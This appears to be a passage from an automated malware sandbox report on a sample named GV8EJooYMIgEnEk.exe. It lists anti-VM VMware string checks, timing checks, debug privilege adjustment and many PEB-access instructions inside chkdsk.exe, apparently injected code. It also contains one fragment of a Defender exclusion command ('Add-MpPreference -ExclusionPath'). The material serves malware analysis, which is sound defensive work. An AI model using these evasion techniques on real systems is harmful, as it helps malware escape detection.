          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000005.00000000.384317833.00000000047D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000005.00000000.356172587.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.352537761.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000005.00000000.356094348.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_004088D0 rdtsc 3_2_004088D0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]10_2_04E06CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]10_2_04E06CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06CF0 mov eax, dword ptr fs:[00000030h]10_2_04E06CF0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E414FB mov eax, dword ptr fs:[00000030h]10_2_04E414FB
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58CD6 mov eax, dword ptr fs:[00000030h]10_2_04E58CD6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9849B mov eax, dword ptr fs:[00000030h]10_2_04D9849B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA44B mov eax, dword ptr fs:[00000030h]10_2_04DBA44B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h]10_2_04E1C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1C450 mov eax, dword ptr fs:[00000030h]10_2_04E1C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA746D mov eax, dword ptr fs:[00000030h]10_2_04DA746D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41C06 mov eax, dword ptr fs:[00000030h]10_2_04E41C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]10_2_04E5740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]10_2_04E5740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5740D mov eax, dword ptr fs:[00000030h]10_2_04E5740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]10_2_04E06C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]10_2_04E06C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]10_2_04E06C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06C0A mov eax, dword ptr fs:[00000030h]10_2_04E06C0A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBBC2C mov eax, dword ptr fs:[00000030h]10_2_04DBBC2C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]10_2_04E4FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]10_2_04E4FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]10_2_04E4FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4FDE2 mov eax, dword ptr fs:[00000030h]10_2_04E4FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E38DF1 mov eax, dword ptr fs:[00000030h]10_2_04E38DF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov ecx, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E06DC9 mov eax, dword ptr fs:[00000030h]10_2_04E06DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h]10_2_04D9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9D5E0 mov eax, dword ptr fs:[00000030h]10_2_04D9D5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h]10_2_04DBFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBFD9B mov eax, dword ptr fs:[00000030h]10_2_04DBFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h]10_2_04E505AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E505AC mov eax, dword ptr fs:[00000030h]10_2_04E505AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]10_2_04D82D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]10_2_04D82D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]10_2_04D82D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]10_2_04D82D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D82D8A mov eax, dword ptr fs:[00000030h]10_2_04D82D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]10_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]10_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]10_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2581 mov eax, dword ptr fs:[00000030h]10_2_04DB2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]10_2_04DB1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]10_2_04DB1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB1DB5 mov eax, dword ptr fs:[00000030h]10_2_04DB1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB35A1 mov eax, dword ptr fs:[00000030h]10_2_04DB35A1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA7D50 mov eax, dword ptr fs:[00000030h]10_2_04DA7D50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC3D43 mov eax, dword ptr fs:[00000030h]10_2_04DC3D43
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03540 mov eax, dword ptr fs:[00000030h]10_2_04E03540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h]10_2_04DAC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC577 mov eax, dword ptr fs:[00000030h]10_2_04DAC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58D34 mov eax, dword ptr fs:[00000030h]10_2_04E58D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E0A537 mov eax, dword ptr fs:[00000030h]10_2_04E0A537
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4E539 mov eax, dword ptr fs:[00000030h]10_2_04E4E539
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]10_2_04DB4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]10_2_04DB4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB4D3B mov eax, dword ptr fs:[00000030h]10_2_04DB4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8AD30 mov eax, dword ptr fs:[00000030h]10_2_04D8AD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D93D34 mov eax, dword ptr fs:[00000030h]10_2_04D93D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB36CC mov eax, dword ptr fs:[00000030h]10_2_04DB36CC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC8EC7 mov eax, dword ptr fs:[00000030h]10_2_04DC8EC7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FEC0 mov eax, dword ptr fs:[00000030h]10_2_04E3FEC0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58ED6 mov eax, dword ptr fs:[00000030h]10_2_04E58ED6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB16E0 mov ecx, dword ptr fs:[00000030h]10_2_04DB16E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D976E2 mov eax, dword ptr fs:[00000030h]10_2_04D976E2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]10_2_04E50EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]10_2_04E50EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E50EA5 mov eax, dword ptr fs:[00000030h]10_2_04E50EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E046A7 mov eax, dword ptr fs:[00000030h]10_2_04E046A7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FE87 mov eax, dword ptr fs:[00000030h]10_2_04E1FE87
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D97E41 mov eax, dword ptr fs:[00000030h]10_2_04D97E41
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]10_2_04E4AE44
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E4AE44 mov eax, dword ptr fs:[00000030h]10_2_04E4AE44
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAAE73 mov eax, dword ptr fs:[00000030h]10_2_04DAAE73
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9766D mov eax, dword ptr fs:[00000030h]10_2_04D9766D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]10_2_04DBA61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA61C mov eax, dword ptr fs:[00000030h]10_2_04DBA61C
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]10_2_04D8C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]10_2_04D8C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8C600 mov eax, dword ptr fs:[00000030h]10_2_04D8C600
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB8E00 mov eax, dword ptr fs:[00000030h]10_2_04DB8E00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E3FE3F mov eax, dword ptr fs:[00000030h]10_2_04E3FE3F
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E41608 mov eax, dword ptr fs:[00000030h]10_2_04E41608
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8E620 mov eax, dword ptr fs:[00000030h]10_2_04D8E620
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC37F5 mov eax, dword ptr fs:[00000030h]10_2_04DC37F5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D98794 mov eax, dword ptr fs:[00000030h]10_2_04D98794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]10_2_04E07794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]10_2_04E07794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07794 mov eax, dword ptr fs:[00000030h]10_2_04E07794
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E58F6A mov eax, dword ptr fs:[00000030h]10_2_04E58F6A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9EF40 mov eax, dword ptr fs:[00000030h]10_2_04D9EF40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9FF60 mov eax, dword ptr fs:[00000030h]10_2_04D9FF60
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAF716 mov eax, dword ptr fs:[00000030h]10_2_04DAF716
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]10_2_04DBA70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA70E mov eax, dword ptr fs:[00000030h]10_2_04DBA70E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]10_2_04E5070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E5070D mov eax, dword ptr fs:[00000030h]10_2_04E5070D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBE730 mov eax, dword ptr fs:[00000030h]10_2_04DBE730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]10_2_04E1FF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1FF10 mov eax, dword ptr fs:[00000030h]10_2_04E1FF10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]10_2_04D84F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D84F2E mov eax, dword ptr fs:[00000030h]10_2_04D84F2E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov ecx, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E1B8D0 mov eax, dword ptr fs:[00000030h]10_2_04E1B8D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D858EC mov eax, dword ptr fs:[00000030h]10_2_04D858EC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D89080 mov eax, dword ptr fs:[00000030h]10_2_04D89080
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov ecx, dword ptr fs:[00000030h]10_2_04DBF0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]10_2_04DBF0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBF0BF mov eax, dword ptr fs:[00000030h]10_2_04DBF0BF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]10_2_04E03884
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E03884 mov eax, dword ptr fs:[00000030h]10_2_04E03884
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC90AF mov eax, dword ptr fs:[00000030h]10_2_04DC90AF
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB20A0 mov eax, dword ptr fs:[00000030h]10_2_04DB20A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]10_2_04DA0050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DA0050 mov eax, dword ptr fs:[00000030h]10_2_04DA0050
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E51074 mov eax, dword ptr fs:[00000030h]10_2_04E51074
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E42073 mov eax, dword ptr fs:[00000030h]10_2_04E42073
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]10_2_04E54015
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E54015 mov eax, dword ptr fs:[00000030h]10_2_04E54015
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D9B02A mov eax, dword ptr fs:[00000030h]10_2_04D9B02A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]10_2_04E07016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]10_2_04E07016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E07016 mov eax, dword ptr fs:[00000030h]10_2_04E07016
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB002D mov eax, dword ptr fs:[00000030h]10_2_04DB002D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E141E8 mov eax, dword ptr fs:[00000030h]10_2_04E141E8
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]10_2_04D8B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]10_2_04D8B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04D8B1E1 mov eax, dword ptr fs:[00000030h]10_2_04D8B1E1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E069A6 mov eax, dword ptr fs:[00000030h]10_2_04E069A6
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB2990 mov eax, dword ptr fs:[00000030h]10_2_04DB2990
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAC182 mov eax, dword ptr fs:[00000030h]10_2_04DAC182
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DBA185 mov eax, dword ptr fs:[00000030h]10_2_04DBA185
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04E051BE mov eax, dword ptr fs:[00000030h]10_2_04E051BE
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]10_2_04DB61A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DB61A0 mov eax, dword ptr fs:[00000030h]10_2_04DB61A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DAB944 mov eax, dword ptr fs:[00000030h]10_2_04DAB944
